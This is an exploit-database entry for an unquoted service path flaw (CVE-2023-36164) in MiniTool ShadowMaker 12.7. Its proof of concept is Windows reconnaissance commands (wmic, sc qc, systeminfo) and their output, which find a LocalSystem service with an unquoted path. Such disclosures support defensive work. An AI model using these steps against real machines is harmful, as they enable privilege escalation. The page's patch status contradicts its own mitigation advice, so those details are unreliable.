header-logo
Suggest Exploit
vendor:
Partition Wizard ShadowMaker
by:
Idan Malihi
6.8
CVSS
MEDIUM
Unquoted Service Path
428
CWE
Product Name: Partition Wizard ShadowMaker
Affected Version From: 12.7
Affected Version To: 12.7
Patch Exists: NO
Related CWE: CVE-2023-36164
CPE: a:minitool:partition_wizard_shadowmaker:12.7
Metasploit:
Other Scripts:
Platforms Tested: Microsoft Windows 10 Pro
2023

MiniTool Partition Wizard ShadowMaker v.12.7 – Unquoted Service Path

This exploit takes advantage of an unquoted service path vulnerability in MiniTool Partition Wizard ShadowMaker v.12.7. By exploiting this vulnerability, an attacker can potentially gain elevated privileges on the target system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of MiniTool Partition Wizard ShadowMaker or apply the vendor-supplied patch.
Source

Exploit-DB raw data:

# Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: https://www.minitool.com/
# Software Link: https://www.minitool.com/download-center/
# Version: 12.7
# Tested on: Microsoft Windows 10 Pro
# CVE : CVE-2023-36164

# PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
MTAgentService                                                                      MTAgentService                            C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe                             Auto

C:\Users>sc qc MTAgentService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTAgentService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : MTAgentService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name:                 DESKTOP-LA7J17P
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19042 N/A Build 19042
OS Manufacturer:           Microsoft Corporation

Navigation

Suggest Exploit

Services By CQR